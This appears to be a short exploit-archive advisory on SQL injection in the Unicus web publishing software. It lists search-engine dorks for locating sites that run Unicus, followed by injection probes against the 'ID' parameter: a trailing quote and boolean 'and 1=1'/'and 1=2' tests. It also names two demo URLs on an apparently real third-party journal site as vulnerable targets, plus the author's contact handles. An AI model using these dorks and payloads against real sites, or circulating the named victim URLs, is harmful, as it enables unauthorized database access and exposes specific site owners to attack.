[+] Title: Unicus SQL Injection
[+] Author: h4shur
[+] date:2020-11-07
[+] Vendor Homepage: https://www.unicusmarketing.com/
[+] Software Link: https://www.unicusmarketing.com/
[+] Tested on: Windows 10 & Google Chrome
[+] Category : Web Application Bugs
[+} Dork : intext:"Powered by Unicus"
intext:"Powered by Unicus" inurl:"article.php?ID="
intext:"Powered by Unicus" inurl:"issue.php?ID="
intext:"Powered by Unicus" inurl:".php?ID="
### Note:
[+] Add the quotation mark (') to the end of the link :
* Target.com/article.php?ID==4'
[+] First add "and 1 = 1" and then "and 1 = 2" to the end of the link :
* Target.com/article.php?ID=4 and 1=1
* Target.com/article.php?ID=4 and 1=2
### Demo:
[+] http://animalbehaviorandcognition.org/issue.php?id=25
[+] http://animalbehaviorandcognition.org/article.php?id=1140
### Contact Me :
* Email : h4shursec@gmail.com
* twitter : @h4shur
* Telegram : @h4shur
* Instagram : @netedit0r